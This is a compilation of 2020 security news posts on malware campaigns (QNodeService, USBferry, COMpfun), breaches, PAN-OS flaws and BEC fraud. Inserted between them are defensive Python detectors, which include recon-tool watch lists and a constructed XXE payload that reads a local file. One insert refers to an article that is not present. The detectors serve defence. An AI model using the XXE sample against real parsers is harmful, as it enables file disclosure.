(SecurityAffairs – Coronavirus, hacking)

The post Microsoft is open-sourcing COVID-19 threat intelligence appeared first on Security Affairs.

QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in a Coronavirus-themed phishing campaign in which crooks promise victims COVID-19 tax relief.

Researchers uncovered a new malware dubbed QNodeService that was employed in a Coronavirus-themed phishing campaign. The operators behind the campaign use a COVID-19 lure promising victims tax relief.

The phishing messages deliver a Trojan sample as a file named “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar”; experts from MalwareHunterTeam noticed that the malicious code was detected only by ESET’s antivirus.

The QNodeService Trojan is written in Node.js and is delivered through a Java downloader embedded in the .jar file, Trend Micro warns. 

“Running this file led to the download of a new, undetected malware sample written in Node.js; this trojan is dubbed as “QNodeService”.” reads the analysis published by Trend Micro.

“The use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.”

QNodeService is able to perform a broad range of activities, such as downloading/uploading/executing files, stealing credentials from the Chrome and Firefox browsers, and managing files. The malware can also steal system information including IP address and location, download additional malware payloads, and exfiltrate stolen data. The current malware only targets Windows systems, but experts believe that the developers are working to make it a cross-platform threat.

The Java downloader embedded in the bait document is obfuscated with Allatori; it downloads the Node.js malware file (either “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”) and a file called “wizard.js.”

Either a 32-bit or 64-bit version of Node.js is dropped depending on the Windows system architecture of the target machine. 

The wizard.js file is an obfuscated JavaScript (Node.js) file used to achieve persistence by creating a “Run” registry key entry and to download another malicious payload.
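Persistence through a “Run” key is something defenders can audit directly. The Python below is an added example for this post (not Trend Micro’s code and not a QNodeService artifact): it parses a constructed .reg export of the Run keys, undoes the .reg escaping, and scores each entry that launches a script host such as node.exe, passes a .js/.vbs/.hta/.ps1 argument, or runs from a user-writable path. The paths, value names and the “Updater” entry are made up for illustration; the scoring weights are simple heuristics to tune for your environment.

```python
import re

# Heuristics; extend for your environment.
SCRIPT_HOSTS = {"node.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
SCRIPT_EXTENSIONS = (".js", ".vbs", ".hta", ".ps1")
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
RUN_KEY_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")

# Constructed .reg export (made up for this example; the "Updater" entry is an
# illustration of what a Node.js-based persistence entry could look like, not a
# real QNodeService artifact).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="\"C:\\Users\\alice\\AppData\\Roaming\\nodejs\\node.exe\" \"C:\\Users\\alice\\AppData\\Roaming\\nodejs\\wizard.js\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Legacy"=hex(2):43,00,00,00
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def unescape(s):
    """Undo .reg escaping (backslash-backslash, backslash-quote) in one pass."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def leaf(path):
    """Last path component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def parse_run_entries(reg_text):
    """Return (key, value_name, command) for REG_SZ values under Run/RunOnce."""
    entries, key = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        if key is None or not key.lower().endswith(RUN_KEY_SUFFIXES):
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        name, data = m.group(1), m.group(2)
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':  # REG_SZ only
            entries.append((key, unescape(name), unescape(data[1:-1])))
    return entries


def split_command(cmd):
    """Split a Run value into (executable path, argument string)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end != -1:
            return cmd[1:end], cmd[end + 1:]
    head, _, rest = cmd.partition(" ")
    return head, rest


def score_entry(command):
    """Score one Run value; a higher score means more worth a look."""
    exe, args = split_command(command)
    score, reasons = 0, []
    if leaf(exe).lower() in SCRIPT_HOSTS:
        score += 2
        reasons.append(f"script host {leaf(exe).lower()}")
    for tok in args.replace('"', " ").split():
        if tok.lower().endswith(SCRIPT_EXTENSIONS):
            score += 2
            reasons.append(f"script argument {leaf(tok)}")
            break
    if any(h in exe.lower() for h in USER_WRITABLE_HINTS):
        score += 1
        reasons.append("executable under a user-writable path")
    return score, reasons


def audit(reg_text, threshold=2):
    """Return the Run entries scoring at or above threshold."""
    findings = []
    for key, name, command in parse_run_entries(reg_text):
        score, reasons = score_entry(command)
        if score >= threshold:
            findings.append({"key": key, "name": name, "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_REG):
        print(f["name"], f["score"], "; ".join(f["reasons"]))
```

A user-writable path alone scores only one point because legitimate per-user software (the OneDrive entry in the sample) lives under AppData too; combining it with a script host or a script argument is what lifts an entry over the threshold.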

One of the most interesting features implemented by the QNodeService malware is the support for an “http-forward” command, which allows attackers to download files without directly connecting to a victim’s PC.

“Of particular note is the http-forward command, which allows an attacker to download a file without directly connecting to the victim machine, as shown below in figures 13-16.” continues Trend Micro. “However, a valid request path and access token are required to access files on the machine. The C&C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.”

Trend Micro researchers included Indicators of Compromise (IoCs) in their report.

Unfortunately, Coronavirus-themed attacks continue to target individuals, businesses, and organizations worldwide.

At the end of March, experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware that focused on government relief payments.

Operators were spreading it in a spam campaign aimed at stealing victims’ financial information; the spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments.

Researchers revealed that the malware is receiving constant upgrades to improve its capabilities. 

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post QNodeService Trojan spreads via fake COVID-19 tax relief appeared first on Security Affairs.

Chinese APT Tropic Trooper target air-gapped military Networks in Asia

A Chinese threat actor, tracked as Tropic Trooper and KeyBoy, has been targeting air-gapped military networks in Taiwan and the Philippines.

Chinese APT group Tropic Trooper, aka KeyBoy, has been targeting air-gapped military networks in Taiwan and the Philippines, Trend Micro researchers reported.

The Tropic Trooper APT has been active since at least 2011; it was first spotted in 2015 by security experts at Trend Micro when it targeted government ministries and heavy industries in Taiwan and the military in the Philippines.

The threat actor targeted government offices, military, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong.

Since December 2014, the threat actors have been using a malware dubbed USBferry in attacks against military/navy agencies, government institutions, military hospitals, and also a national bank.

“Recently, we discovered the Tropic Trooper group targeting Taiwanese and the Philippine military’s physically isolated environment using a USBferry attack (the name derived from a sample found in a related research).” reads the analysis published by Trend Micro. “USBferry has variants that perform different commands depending on specific targets; it can also combine capabilities, improve its stealth in infected environments, and steal critical information through USB storage”

[Image: Tropic Trooper]

The USBferry USB malware can execute various commands on the infected system and exfiltrate sensitive data through USB storage.

According to Trend Micro’s telemetry, attacks employing USBferry have been ongoing since December 2014 and have targeted military or government users located in Asia.

The malware was first mentioned in a PwC report that attributes it to Tropic Trooper APT, but that did not include a detailed analysis.

The attackers would first target organizations related to the military or government that implement fewer security measures compared with the real targets, then attempt to use them as a proxy to the final target. In one case, the hackers compromised a military hospital and used it to move to the military’s physically isolated network.

Trend Micro researchers identified at least three versions of the malware with different variants and components.

“Tropic Trooper uses the old way of achieving infection: by ferrying the installer into an air-gapped host machine via USB.” continues the report. “They employ the USB worm infection strategy using the USB device to carry the malware into the target’s computer and facilitate a breach into the secure network environment.”

The group used “tracert” and “ping” commands to map the target’s network architecture (i.e. “tracert -h 8 8.8.8.8” collects the route (path) and measures transit delays of packets across an Internet Protocol (IP) network, while pings allow testing the target network’s connectivity).

The attackers attempted to determine if the infected machine has access to the internal network and the target mail portal.

In the absence of network connectivity, the malware collects information from the machine and copies the data to the USB drive.
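Two behaviours described on this page leave the same kind of trace in process-creation telemetry: the Central Asia campaign’s use of WMI for lateral movement (the Mikroceen article above) and Tropic Trooper’s tracert/ping network mapping here. The Python detector below is an added example written for this post, not code from ESET, Avast or Trend Micro. The pipe-delimited record layout, host names and parent images are constructed for the example, and the three rules (a shell spawned by WmiPrvSE.exe, a recon tool launched by a non-interactive parent, and a burst of recon commands on one host) are simple heuristics rather than vendor detections.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Heuristic lists; tune them to the environment.
RECON_TOOLS = {"tracert.exe", "ping.exe", "nbtstat.exe", "net.exe", "ipconfig.exe", "arp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}

# Constructed process-creation records (not real telemetry). The field layout
# is an assumption for this example: time|host|parent_image|image|command_line
SAMPLE_EVENTS = """\
2020-05-12T08:00:00|WS-01|C:\\Windows\\System32\\wbem\\WmiPrvSE.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami
2020-05-12T08:00:01|WS-01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\whoami.exe|whoami
2020-05-12T09:10:00|WS-02|C:\\Users\\bob\\AppData\\Local\\Temp\\updater.exe|C:\\Windows\\System32\\TRACERT.EXE|tracert -h 8 8.8.8.8
2020-05-12T09:10:20|WS-02|C:\\Users\\bob\\AppData\\Local\\Temp\\updater.exe|C:\\Windows\\System32\\PING.EXE|ping -n 1 10.1.0.1
2020-05-12T09:10:40|WS-02|C:\\Users\\bob\\AppData\\Local\\Temp\\updater.exe|C:\\Windows\\System32\\PING.EXE|ping -n 1 mail.corp.example
2020-05-12T10:30:00|WS-03|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\PING.EXE|ping 10.1.0.1
"""


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Parse pipe-delimited records into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue
        events.append({
            "time": datetime.fromisoformat(parts[0]),
            "host": parts[1],
            "parent": basename(parts[2]),
            "image": basename(parts[3]),
            "cmdline": parts[4],
        })
    return events


def analyze(text, window=timedelta(minutes=5), burst=3):
    """Return a list of findings, each {"rule", "host", "detail"}."""
    findings = []
    recon_by_host = defaultdict(list)
    for ev in parse_events(text):
        # Remote WMI execution: the WMI provider host spawning a shell.
        if ev["parent"] == "wmiprvse.exe" and ev["image"] in SHELLS:
            findings.append({"rule": "wmi_spawned_shell", "host": ev["host"], "detail": ev["cmdline"]})
        if ev["image"] in RECON_TOOLS:
            recon_by_host[ev["host"]].append(ev)
            # Network mapping launched by something other than a user's shell.
            if ev["parent"] not in INTERACTIVE_PARENTS:
                findings.append({"rule": "recon_noninteractive_parent", "host": ev["host"],
                                 "detail": f"{ev['parent']} -> {ev['cmdline']}"})
    # Several recon commands on one host inside a short window.
    for host, evs in recon_by_host.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            if len(in_window) >= burst:
                findings.append({"rule": "recon_burst", "host": host,
                                 "detail": f"{len(in_window)} recon commands within {window}"})
                break
    return findings


def count_by_rule(text):
    """Number of findings per rule, handy for tuning thresholds."""
    counts = defaultdict(int)
    for f in analyze(text):
        counts[f["rule"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["host"], f["rule"], f["detail"])
```

In the sample, WS-03’s single ping from an interactive cmd.exe produces nothing, which is the point of keying the recon rules on the parent process and on volume rather than on the command alone.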

The experts also discovered that the hackers used different backdoors in a recent attack, including WelCome To Svchost, Welcome To IDShell, and Hey! Welcome Server.

The arsenal of the APT group includes scanning tools, a command-line remote control listener/port relay tool, and backdoor payload/steganography payload execution loaders.

“This targeted attack operation can be broken down into four important points.” concludes the report. “First, putting critical data in physically isolated networks is not an overarching solution for preventing cyberespionage activities. Second, their preferred technique of steganography isn’t just used to deliver payloads, but also for sending information back to the C&C server. Third, several hacking tools and components can be used to fulfill attacks in different target networks and environments. These tools and components also have a self-delete command to make it tricky to trace the attack chain and all the related factors. Lastly, using an invisible web shell hides their C&C server location and makes detecting malicious traffic more difficult for network protection products.”

Pierluigi Paganini

(SecurityAffairs – Tropic Trooper, hacking)

The post Chinese APT Tropic Trooper target air-gapped military Networks in Asia appeared first on Security Affairs.

Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed

Britain’s Ministry of Defence contractor Interserve has been hacked, intruders have stolen up to 100,000 past and present employees’ details.

Interserve, a contractor for Britain’s Ministry of Defence, suffered a security breach in which hackers stole up to 100,000 past and current employees’ details. The company currently has around 53,000 employees. Stolen data includes payment information and details of their next of kin.

“Outsourcing group Interserve is recovering from a cyberattack which took place over the weekend that may have seen the details of up to 100,000 people stolen.” reported The Telegraph.

“Hackers broke into a human resources database owned by the outsourcing firm, which recently helped build the Birmingham Nightingale Hospital, on May 9 and stole information on current and former Interserve employees, a company insider said.”

Attackers might have accessed names, addresses, bank details, payroll information, next of kin details, HR records, dates of absences, and pension information.

The security breach took place in early May; at the time of writing there are no details about the attack and the number of affected individuals is unclear.

“Interserve was the target of a cyber security attack earlier this month.” reads a press release published by the company on its website.

“Interserve is working closely with the National Cyber Security Centre (NCSC) and Strategic Incident Response teams to investigate, contain and remedy the situation. This will take some time and some operational services may be affected. Interserve has informed the Information Commissioner (ICO) of the incident. We will provide further updates when appropriate.”

The defense contractor is investigating the incident with the help of the National Cyber Security Centre.

According to the defense contractor’s website, Interserve is present on 35 MoD sites, the company also announced that it is supporting the NHS during COVID-19.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed appeared first on Security Affairs.

Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands

Russia-linked cyberespionage group Turla targets diplomatic entities in Europe with a new piece of malware tracked as COMpfun.

Security experts from Kaspersky Lab have uncovered a new cyberespionage campaign carried out by Russia-linked APT Turla that employs a new version of the COMpfun malware. The new malware allows attackers to control infected hosts using a technique that relies on HTTP status codes.

COMpfun was first spotted in the wild in 2014 by G DATA researchers; Kaspersky first observed the threat in autumn 2019, when it was employed in attacks against diplomatic entities across Europe.

“You may remember that in autumn 2019 we published a story about how a COMpfun successor known as Reductor infected files on the fly to compromise TLS traffic.” reads the analysis published by Kaspersky. “The campaign operators retained their focus on diplomatic entities, this time in Europe, and spread the initial dropper as a spoofed visa application.”

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007, targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and also includes the Swiss defense firm RUAG, the US Department of State, and the US Central Command.

In March the APT group employed two new pieces of malware in watering hole attacks targeting several high-profile Armenian websites.

The COMpfun malware analyzed by Kaspersky implements a new technique to receive commands from the C2 as HTTP status codes.

COMpfun is a remote access trojan (RAT) that can collect system data, log keystrokes, and take screenshots.

[Image: Turla COMpfun]

The new variant of the COMpfun malware includes two new features: the ability to monitor when USB removable devices are plugged into or unplugged from the host, and the C2 communication technique mentioned above.

The first feature was implemented to allow the malware to propagate itself to the connected device.

The second feature was implemented to avoid detection: Turla vxers implemented a new C2 protocol that relies on HTTP status codes.

HTTP status codes report the state of the server and instruct clients on what to do next (e.g. drop the connection); COMpfun abuses this mechanism to control the bot running on the compromised systems.

“We observed an interesting C2 communication protocol utilizing rare HTTP/HTTPS status codes (check IETF RFC 7231, 6585, 4918). Several HTTP status codes (422-429) from the Client Error class let the Trojan know what the operators want to do. After the control server sends the status “Payment Required” (402), all these previously received commands are executed.” continues the analysis.

For example, if the COMpfun server responds with a 402 status code followed by a 200 status code, the malware sends the collected target data to the C2 along with the current tick count.

Below is the list of commands associated with the HTTP status codes:

HTTP status | RFC status meaning | Corresponding command functionality
200 | OK | Send collected target data to C2 with current tickcount
402 | Payment Required | This status is the signal to process received (and stored in binary flag) HTTP statuses as commands
422 | Unprocessable Entity (WebDAV) | Uninstall. Delete COM-hijacking persistence and corresponding files on disk
423 | Locked (WebDAV) | Install. Create COM-hijacking persistence and drop corresponding files to disk
424 | Failed Dependency (WebDAV) | Fingerprint target. Send host, network and geolocation data
427 | Undefined HTTP status | Get new command into IEA94E3.tmp file in %TEMP%, decrypt and execute appended command
428 | Precondition Required | Propagate self to USB devices on target
429 | Too Many Requests | Enumerate network resources on target
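Because the commands ride in status codes, what a network defender can see is an unusual sequence of responses rather than a distinctive payload. The Python below is an added example for this post (not Kaspersky’s detection logic) that scans constructed proxy log lines for a client that received one or more of the command statuses 422-429 and then the 402 trigger from the same host, mirroring the store-then-execute order described above, and separately flags any 427 response, which no RFC defines. The log format, client addresses and hostnames are assumptions made for the example.

```python
from collections import defaultdict

# Status codes that the COMpfun protocol described above treats as commands,
# and the one that triggers execution of the stored commands.
COMMAND_STATUSES = {422, 423, 424, 427, 428, 429}
TRIGGER_STATUS = 402
UNDEFINED_STATUS = 427  # no RFC defines 427; a real server has no reason to send it

# Constructed proxy log lines (not real traffic). The format is an assumption:
# timestamp client_ip destination_host http_status
SAMPLE_LOG = """\
2020-05-14T09:00:01 10.0.0.5 updates.c2.example 423
2020-05-14T09:00:02 10.0.0.5 updates.c2.example 424
2020-05-14T09:00:03 10.0.0.5 updates.c2.example 402
2020-05-14T09:00:04 10.0.0.5 updates.c2.example 200
2020-05-14T09:01:00 10.0.0.7 files.webdav.example 423
2020-05-14T09:01:05 10.0.0.7 files.webdav.example 200
2020-05-14T09:02:00 10.0.0.9 www.site.example 200
2020-05-14T09:02:01 10.0.0.9 www.site.example 304
2020-05-14T09:03:00 10.0.0.11 cdn.other.example 427
garbage line that must be skipped
"""


def parse_log(text):
    """Yield (timestamp, client, host, status) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue
        yield parts[0], parts[1], parts[2], int(parts[3])


def find_status_code_c2(text):
    """Return {(client, host): [reasons]} for flows that look like COMpfun C2.

    Heuristic 1 mirrors the protocol: one or more command statuses stored by the
    client, then a 402 from the same host that tells it to execute them.
    Heuristic 2 flags any 427 at all, since it is not a defined status code.
    """
    flows = defaultdict(list)
    for _ts, client, host, status in parse_log(text):
        flows[(client, host)].append(status)

    findings = {}
    for flow, statuses in flows.items():
        reasons = []
        pending = []  # command statuses seen before a 402
        for status in statuses:
            if status in COMMAND_STATUSES:
                pending.append(status)
            elif status == TRIGGER_STATUS and pending:
                reasons.append(f"commands {pending} followed by 402 trigger")
                pending = []
        if UNDEFINED_STATUS in statuses:
            reasons.append("undefined HTTP status 427 observed")
        if reasons:
            findings[flow] = reasons
    return findings


if __name__ == "__main__":
    for flow, reasons in find_status_code_c2(SAMPLE_LOG).items():
        print(flow, "->", "; ".join(reasons))
```

The WebDAV flow in the sample (a lone 423 from files.webdav.example) is deliberately not flagged: a single WebDAV status is normal, and requiring the 402 trigger after the stored statuses is what keeps the rule from firing on ordinary WebDAV clients.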

“The malware operators retained their focus on diplomatic entities and the choice of a visa-related application – stored on a directory shared within the local network – as the initial infection vector worked in their favor. The combination of a tailored approach to their targets and the ability to generate and execute their ideas certainly makes the developers behind COMPFun a strong offensive team.” concludes Kaspersky.

Pierluigi Paganini

(SecurityAffairs – Turla, malware)

The post Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands appeared first on Security Affairs.

Palo Alto Networks addresses tens of serious issues in PAN-OS

Palo Alto Networks addressed tens of vulnerabilities in PAN-OS, the software that runs on the company’s next-generation firewalls.

Palo Alto Networks has issued security updates to address tens of vulnerabilities in PAN-OS, the software that runs on the company’s next-generation firewalls.

One of the most severe vulnerabilities, tracked as CVE-2020-2018, is an authentication bypass vulnerability in the Panorama context switching feature. The flaw could be exploited by an attacker with network access to a Panorama’s management interface to gain privileged access to managed firewalls.

“An authentication bypass vulnerability in the Panorama context switching feature allows an attacker with network access to a Panorama’s management interface to gain privileged access to managed firewalls. An attacker requires some knowledge of managed firewalls to exploit this issue.” reads the advisory published by the vendor.

This vulnerability does not impact Panorama configured with custom certificate authentication for communication between Panorama and managed devices.

The issue received a CVSSv3.1 Base Score of 9; it affects PAN-OS 7.1 versions earlier than 7.1.26, PAN-OS 8.1 versions earlier than 8.1.12, PAN-OS 9.0 versions earlier than 9.0.6, and all versions of PAN-OS 8.0.

Palo Alto Networks also addressed an XML external entity reference (‘XXE’) vulnerability, tracked as CVE-2020-2012, that could lead to information leakage.

The flaw could be exploited by unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system.
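To show what an XXE-safe parser looks like in practice, here is an added Python example (not Palo Alto Networks’ code and unrelated to the PAN-OS fix): it pre-checks untrusted XML with expat handlers that reject any DOCTYPE, entity declaration or external entity reference before the document reaches ElementTree, and contrasts that with the common byte-level grep, which a UTF-16 encoded document slips past because the marker bytes are interleaved with nulls. The sample documents are constructed for the example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DTD or entity machinery."""


def _reject(reason):
    """Build an expat handler that aborts parsing with the given reason."""
    def handler(*_args):
        raise UnsafeXML(reason)
    return handler


def check_no_dtd(data: bytes) -> None:
    """Run expat over the bytes and abort on the first DTD-related event.

    expat decodes the document itself (BOM, declared encoding), so this check
    sees the same tokens a real parser would, unlike a grep on the raw bytes.
    """
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = _reject("DOCTYPE declaration not accepted from untrusted input")
    p.EntityDeclHandler = _reject("entity declaration not accepted from untrusted input")
    p.ExternalEntityRefHandler = _reject("external entity reference not accepted")
    p.Parse(data, True)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source; raises UnsafeXML on any DTD use."""
    check_no_dtd(data)
    return ET.fromstring(data)


def is_safe(data: bytes) -> bool:
    """True if the document parses without any DTD machinery."""
    try:
        check_no_dtd(data)
    except (UnsafeXML, expat.ExpatError):
        return False
    return True


def naive_byte_check(data: bytes) -> bool:
    """The common but weak alternative: grep the raw bytes for markers."""
    return b"<!DOCTYPE" not in data and b"<!ENTITY" not in data


# Constructed sample documents (not taken from any advisory or exploit).
BENIGN = b'<config><device name="fw-01" serial="000000"/></config>'
# Classic XXE shape: an external entity that would resolve to a local file.
XXE = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE r [<!ENTITY ext SYSTEM "file:///etc/hostname">]>'
       b'<r>&ext;</r>')
# Same payload re-encoded as UTF-16: the byte grep no longer sees "<!DOCTYPE".
XXE_UTF16 = XXE.decode("ascii").encode("utf-16")


if __name__ == "__main__":
    print("benign:", is_safe(BENIGN), parse_untrusted_xml(BENIGN).tag)
    print("xxe:", is_safe(XXE), "naive grep passes it:", naive_byte_check(XXE))
    print("xxe utf-16:", is_safe(XXE_UTF16), "naive grep passes it:", naive_byte_check(XXE_UTF16))
```

Rejecting the whole DTD, rather than only external entities, is the simpler policy for a management interface that never needs one: it also closes internal-entity expansion attacks, and the check is done by the same library that will parse the document, so there is no second interpretation of the bytes to disagree with.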

The vendor also fixed a high-severity vulnerability, tracked as CVE-2020-2011, that could be exploited by a remote, unauthenticated attacker to trigger a denial-of-service (DoS) condition to all Panorama services by sending specially crafted registration requests.

Other high-severity issues affect the older Nginx version used in the PAN-OS software; some of them can be exploited without authentication.

Palo Alto Networks also addressed a serious cross-site scripting (XSS) vulnerability in the GlobalProtect Clientless VPN that can be exploited to compromise a user’s session by tricking the victim into visiting a malicious website.

The full list of vulnerabilities addressed by Palo Alto Networks is available here.

Pierluigi Paganini

(SecurityAffairs – PaloAlto Networks, hacking)

The post Palo Alto Networks addresses tens of serious issues in PAN-OS appeared first on Security Affairs.

Threat actors are offering for sale 550 million stolen user records

Threat actors are offering for sale tens of databases on a hacker forum that contain roughly 550 million stolen user records.

Security experts from Cyble reported that a threat actor is attempting to sell twenty-nine databases on a hacker forum since May 7. Forum members could also buy each database individually. The archives allegedly contain a total of 550 million stolen user records.

The data appears to come from past data breaches; the oldest dates back to 2012 while the most recent is from April 2020.

The data could be used by crooks to launch credential stuffing attacks against individuals and organizations.

Hackers are also offering for sale a separate database containing 47.1 million phone numbers that are part of the Dubsmash data breach that occurred in 2018.

Below is the list of databases, published by BleepingComputer, that are available for sale:

Company | Amount | Data breach date
Evite.com | 101 million | March 2019
Tokopedia.com | 91 million | April 2020
piZap.com | 60.9 million | April 2018
Netlog.com (Twoo.com) | 57 million | November 2012
Dubsmash.com (phone numbers) | 47.1 million | December 2018
Shein.com | 42 million | June 2018
Fotolog.com | 33.5 million | December 2018
CafePress.com | 23.6 million | February 2019
Wanelo.com (customers) | 23.2 million | December 2018
OMGPop.com | 21.4 million | August 2019
SinglesNet.com | 16.3 million | September 2012
Bukalapak.com | 13 million | February 2018
Bookmate.com | 8 million | July 2018
ReverbNation.com | 7.9 million | January 2014
Wego.com | 6.5 million | N/A
EatStreet.com | 6.4 million | May 2019
PumpUp.com | 6.4 million | N/A
CoffeeMeetsBagel.com | 6.2 million | May 2018
Storybird.com | 4 million | December 2018
Minube.net | 3.2 million | May 2019
Sephora.com | 3.2 million | January 2017
CafeMom.com | 2.6 million | April 2014
Coubic.com | 2.6 million | March 2019
Roadtrippers.com | 2.5 million | May 2019
DailyBooth.com | 1.6 million | April 2014
ClassPass.com | 1.6 million | October 2017
ModaOperandi.com | 1.3 million | April 2019
Rencanamu.id (Youthmanual.com) | 1.1 million | January 2019
StreetEasy.com | 1 million | May 2018
Yanolja.com | 1 million | March 2019

Users can verify whether their credentials are part of one of the above breaches by querying Cyble’s amibreached.com data breach lookup service.

Those who have their account exposed in one of the above incidents are recommended to change their password.

Pierluigi Paganini

(SecurityAffairs – threat actors, hacking)

The post Threat actors are offering for sale 550 million stolen user records appeared first on Security Affairs.

Crooks stole $10 million from Norway’s state investment fund Norfund

Norway’s state investment fund, Norfund, suffered a business email compromise (BEC) attack, hackers stole $10 million.

Hackers stole $10 million from Norway’s state investment fund, Norfund, in a business email compromise (BEC) attack.

Norfund is a private equity company established by the Norwegian Storting (parliament) in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

The fraudsters compromised the Norfund email system and monitored communications between the employees of the fund and their partners for months.

Once they had identified the employee responsible for money transfers, the attackers created a Norfund email address to impersonate an individual authorized to transfer large sums of money through Norfund’s bank.

In a classic BEC scheme, hackers replaced the payment information provided to the partners to hijack the transfer to an account under their control in a bank in Mexico.

“Through an advance data breach, the defrauders were able to access information concerning a loan of USD 10 million (approx. 100 million NOK) from Norfund to a microfinance institution in Cambodia.” reads a notice published by Norfund.

“The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified”

Norfund was not able to block the fraudulent wire transfer because the attackers managed to delay its discovery.

The BEC attack took place on March 16, but it was discovered more than a month later, on April 30, when the fraudsters attempted to carry out a new fraud that was detected and blocked.

To delay the discovery of the scam, the attacker sent an email to the Cambodian beneficiary informing it of a delay due to the current Coronavirus lockdown in Norway.

“This is a grave incident. The fraud clearly shows that we, as an international investor and development organisation, through active use of digital channels are vulnerable. The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this” said company CEO, Tellef Thorleifsson.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Crooks stole $10 million from Norway’s state investment fund Norfund appeared first on Security Affairs.

Zerodium will no longer acquire certain types of iOS exploits due to surplus

The popular zero-day broker Zerodium announced new limitations on the submission of certain types of iOS exploits due to a surplus.

The exploit broker Zerodium announced that it’s no longer accepting certain types of iOS exploits due to a surplus, which implies that prices for them will drop in the near future.

The company announced via Twitter that it would no longer accept submissions for iOS local privilege escalation, Safari remote code execution, and sandbox escape exploits, at least for the coming months.

Zerodium argued that it has taken this decision due to the high number of submissions, a figure that gives an idea of how prolific the exploit-development community is.

Company experts believe that the prices for iOS one-click chains (e.g. via Safari) without persistence will likely drop in the next months.

Zerodium CEO Chaouki Bekrar criticized the current level of iOS security that is evidently going to zero.

“Let’s hope iOS 14 will be better,” said Chaouki Bekrar.

The decision is consistent with the announcement made in September 2019, when Zerodium updated its price list for Android and iOS exploits and, for the first time, valued Android exploits higher than iOS ones.

Under that price list, a zero-click exploit chain for Android is rewarded with up to $2.5 million, while a comparable chain for iOS fetches up to $2 million.

Apple, for its part, runs a public bug bounty program that pays up to $1 million for exploits that achieve persistence, bypass PAC and require no user interaction.

Pierluigi Paganini

(SecurityAffairs – zero-day vulnerability, hacking)

The post Zerodium will no longer acquire certain types of iOS exploits due to surplus appeared first on Security Affairs.

China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal research related to treatments and vaccines for COVID-19.

